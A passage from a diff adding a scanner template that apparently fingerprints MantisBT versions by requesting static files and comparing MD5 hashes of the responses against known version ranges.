"(\"9db7d3ed1d0f3e5665a16d0b9c898890\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_aeb.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"45ab5b3d2d76438d9f500c22df4bfcbb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fed17663a6f39f44237525b877e9418e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/RjgO7rYTmqiVp7vzi-Q5UYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"640a51fc85d8f52e6ca6919e76b6231d\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/fonts/dDzx7Qrpf6EUDCpeO-RralKPGs1ZzpMvnHX-7fPOuAc.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"8a06c170adbf19e0dffcbe868719e6ce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/xozscpT2726on7jbcb_pAoX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"1e86e60675a363ff89aa6d236d97781e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/59ZRklaO5bWGqF5A9baEEYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"263e2fde7e3f1a4dfbfd6e40de4ced03\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/rBHvpRWBkgyW99dXT88n7wsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"3bcb2e4e644c6c2c93e6b9e65132e39b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/K88pR3goAWT7BTt32Z01m4X0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"7cae1e36ddd5d05afd1e023e17280701\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/u-WUoqrET9fUeobQW7jkRYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"43cb98c9f37710db018c1739d9d1a91b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/NX1NravqaXESu9fFv7KuqgsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"161651057d81a4076c609fc86b9e1078\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/w5uwZf-mdghB6LOAw_y9AFKPGs1ZzpMvnHX-7fPOuAc.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"3813954e62ff3df394ccf95ed2ceeceb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/cJZKeOuBrn4kERxqtaUH3ZBw1xU1rKptJj_0jans920.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"8e3f978a77d191a9e7f94ff9e7090085\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/fonts/gFXtEMCp1m_YzxsBpKl68gsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"8c3e2934e7ead5fe718acb8e35878688\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/zhcz-_WihjSQC0oHJ9TCYAzyDMXhdD8sAj6OAJTFsBI.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"cdd5aad3fd6aaa1b80d5119924cd0d52\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/HUuNgGR31mqIHE6zs0BlBgLUuEpTyoUstqEm5AMlJo4.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"ce0c9ae08840a0b43bccb9f5a86e155d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/SKK6Nusyv8QPNMtI4j9J2wsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"1383e1a4581a5fedece636cfec8854fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/LWCjsQkB6EMdfHrEVqA1KYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"f959142bf8b8a8131cf4ab69c40b8bd6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"3f8b6cd21447bfa0d80b707491a46a82\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_fa.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fcbf98c8267756c91b3bc45baba6bfa8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_bn.txt" + + matchers: + - type: dsl + name: 2.10.0 - 2.11.1 + dsl: + - "(\"a47e6f2aeeec218e460fa7c2ade0ce53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_mwl.txt" + + matchers: + - type: dsl + name: 2.10.0 - 2.11.1 + dsl: + - "(\"e84ba2159b76fce0ffa635aea71b8760\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/timetracking.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.9.1 + dsl: + - 
"(\"63fb68d786ae495ce556ddc089950022\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.24.3 + dsl: + - "(\"3fd67c131042b906bd341ce045165782\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/README" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"f74b555082b8bcbd25909dddd970bd26\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/adodb-time.zip" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.7 + dsl: + - "(\"e8586f60e93359dd15c15832ab100210\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_czech_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"379215fb2071d003559034f77bcdfaea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"61cfe21a396d42a8a8f0a86609a03e9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_korean_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"fdcdcc6aec537b6ae2bd662dd98ddfaa\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"9a4a3d0b657d05a4855cb81cb78291ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_italian_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"d7521a657bbee821a594919ff4c48f71\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"6a8ae46f90949556aab4a319ee9bc278\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovene_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"510c5c725d54414fbb92c7e5c4b3c651\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_polish_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"20ccc365263d4514f9b613314d0aaf0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/unknownicon.gif" + 
+ matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b7ea9920fbf16b2d10b36b5d6c47a440\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/excelicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"d8b116d5a73fb9576799264d6a073396\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/zipicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"e47b673f360c57be8437841fdea7351c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/pdficon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9cb8ae8481d24743d57e81a2280ffaae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/wordicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"31f4faaa0dd89d7f28fcf1ba068437f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/word2icon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"0c2af6ba5756409ce9a66dab8b3a5ae5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/texticon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"f3fa1d34ae216911d245672e3db9235b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/htmlicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"338ca0065c22f2a9f699a46c5bf1e7ab\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"a8cde8384a414838f99be196e53ae039\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/pdf2icon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"1a56758ef0868ca9ace5f0d78d051263\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/gificon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b67bed81d8bbea1e5590547ef85e1aa0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mailicon.gif" + + matchers: + - type: dsl + 
name: 1.0.0 - 1.0.8 + dsl: + - "(\"098b7636e4f7d4bcd8f55e441e7d3342\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/pngicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"4c2b6a95930efc2a58c99c87aca61851\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/jpgicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"330542d19122885a098aec151a68609a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ieicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"800d2395bd737075d8e67779d304d3e5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/excel2icon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"36d7ad1391984bec980c28ab89bb64af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ppticon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"dbd0042c18070d1d2e5c7e29776b5e53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/drivers/adodb-sqlite.inc.php.bak" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.6 + dsl: + - "(\"acfd5053382a3537bf30ff30b0fd6f29\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_bulgarian_1251.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"539aaddb2dfb50a8b696bf1434a1fea7\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"69a72e0af1f00e831e9e2d3da953040c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_polish_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9b159e035369667dfe1322c08fd88fcc\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"050730aaca55736d2008231a1ee3f327\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ukrainian_1251.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"8e3774bf377f85ff8ab6a6ca594b19f9\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + 
- "(\"db7f51988af0e213e4977a3e69440d64\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_danish_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"143d1841ba23f7e706d7ff3bfaf76d4d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"bce731e525a48e242b851e8e90810983\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_standard_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"73a63a116a7e04f5b5ed67dcf958b5b7\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"36b7de97e2939313ac923a09be61c882\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_hungarian_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"46a4bfa2572fb5f277988e98b987d08d\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.6 + dsl: + - "(\"060a0b8a99b8f1d1572f4f64b7790edd\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"f2cd96a215bb3728f320d2746903ccfa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"afaa84f850809cc21a23fd120dd8efc4\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.6 + dsl: + - "(\"53663e49b472df11f0784871d319018f\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"26ecb6a97311ef038ca40ef9fd04f24d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_czech_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"1db4819a335c4b1d1404d7573d15cc9e\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"5f9e733855a162996222d247e1d137de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_brazil_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9d1c90d8dd32dcc42c4cc79164d47da6\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - 
"(\"6ab8c0ccccb50a0dbb3e28f77d4c1ebc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_icelandic_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"5022495c46b3dd014d6ca85468c35da5\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"f42698512a598c79c1a48cd33ed650f5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_finnish_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"e81617bba67e1b359f9b6884888b0ccf\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"8cdfc486ee02afea843f0b133c743693\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian_1251.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"2f4f9910368fee6158d33c0e9994a906\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"dda05b19130721b286fb659135e9308d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_lithuanian_1257.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"98c2dce369efc91db12b0decda68ec6c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"1d9a3f84e1b6cac7d79e10f2976650fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_catalan_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"14392a88739c0edccd9f5e7d3bb62f85\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"40422c391c62ed889ca88c473defcc0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovak_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"b8a0a03881d0b20db4a2b3fe7078a22d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"d60aaf3fce2fa55988ee39b35340ed75\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_serbian_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"31bdc7c28183c4f6bcd502a14b443e8f\" == md5(body))" 
+ - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"9c834dec4037c257e46878a020b232fd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_korean_euc-kr.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"0d23d31d5c136dea71aac3a61ceceaf1\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"69e5a4d596b5d5e91bcb450d32827875\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_traditional_big5.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"bff23728d5d14f0c73ade3dd5831d9af\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"467b5d702129c78de5e8a6467617a7c8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_swedish_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"b1abc04f4bb8191a0db2769a62241f1a\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"28751940c9338d5822ba4b3c6678d53d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_latvian_1257.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"f3ca33210fd6ce0aa827b321265bad41\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"d06a3c02094e30bd44fd411a1e63bab4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_croatian_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"2c945333f7d334d5bb08e436ff3be14e\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"e1a7ffeb0eb1c2b2a4f4f4e67140ad6c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_estonian_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"32afb713876910b00d9ff31f660e8ce3\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"5ea5e4b80e6dde0b7204cdcd13773ac8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_german_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - 
"(\"bbcd53eb0aa5f8c129885c422bbcc358\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"0fe53871001a9024d537524dea489103\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_simplified_gb2312.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"480a9ad7b1b6d2129fcd9e3887f32941\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"c6200032376438a0ffebd21d37d0d74e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_german_eintrag.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9c791797c5741e587e4bb3dfde5c2411\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"32d484f6454a29c257d836044d35aa8e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_turkish_8859-9.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"69fa68d9b79e63940a22bb3da3d6ba0d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"2ffef0a07b4d33abb194375fb9938619\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovene_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"47fd04c544efbead2d96b8e3a26001ae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"6e94e6d4d8e4ada5c5172c28cffd7ca9\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"01c6cf1263d076e69bf3b6eadc07b342\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_dutch_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"501564f941193f49064ee7e8267d8a52\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"f6d828eb6c4381e87e434295d68247ae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_spanish_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"7269163b39bded3230dc6bad8cb69bf0\" == 
md5(body))" + - type: dsl + name: 1.1.2 - 1.1.6 + dsl: + - "(\"dec03acd68260dfed46c5aa475a29378\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"18bf57d74202c95933f1e6f7516d912a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rss.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"f8afe1dc253c1f4d7ba707b7adc4254a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/addLoadEvent.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"94f23d58a0fcbd4facf9409f32930bd4\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"443e52678f99abd9bfb9a06733446d92\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/builder.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"09bcb24e92ed01f582f45c14cec2b47f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/prototype.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/effects.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"9739220ad1d1903a67c669d0028b3573\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/prototype_b.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/scriptaculous.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"2379e43931989fba9c4837631ff36493\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/license.html" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"922a7dcc62938e0d7ff7c40586503f46\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/slider.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"b269a3bc58a705e7971a991df421d512\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/dragdrop.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e81bcb5a62616ff00551ffb3abfdae6d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/MIT-LICENSE" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/controls.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"245572dbb90f531a5a07ac1bb0646e39\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"46811ee79796d2345bea2308475d1ec9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"cd7202608bed364dd95bbd2e2c05d917\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"b8bb29e3c1573d0d2917cd3112b5052d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"cf3ac9080722f41e5169cf1454392be5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/time_tracking_stopwatch.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e4e04dce5c5c104c8419d1a1c0384fb4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/ajax.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"1f4d693fc80bd57cf57bbc5357ad3c99\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/common.js" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"a85fcf54c0907bfc4511c0d199f71421\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - 
"(\"891397ebcdf907538d2fde890b574376\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"d339af08f67531448de65e711df5c93f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/xmlhttprequest.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"38896b1694213ad5a60f78c05e265159\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"adbb9b4e829fe9c0c8416f3c4ba8b5b9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dynamic_filters.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"f1bdab2b1634f6406a540751706585b7\" == md5(body))" + - type: dsl + name: 1.0.7 - 1.0.8 + dsl: + - "(\"842fce4b2f87d0ff5243fab7f09799b2\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.6 + dsl: + - "(\"4ef0ef843e2534ef30fc0af9bb118781\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/UPGRADING" + + matchers: + - type: dsl + name: 1.1.1 - 1.1.9 + dsl: + - "(\"b8977dc1178c07b7640034e9da33a207\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"84e0eacd2244eaad4069ffc560dec378\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/soap/nusoap/changelog" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e6078fa2cf405ed4176b9066fd4c8866\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/remove-0.3.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"678d96591452812ec32cfffc56877b51\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/convert-0.1-0.3.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"6aadb6a50dc09f6e776d5847f70432d0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/remove-0.2.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"0b2b85762fe8c79ec259c25098840e4d\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"f8d8add7151f0f67ade0c791aea335c0\" == md5(body))" + + - method: GET + path: + - 
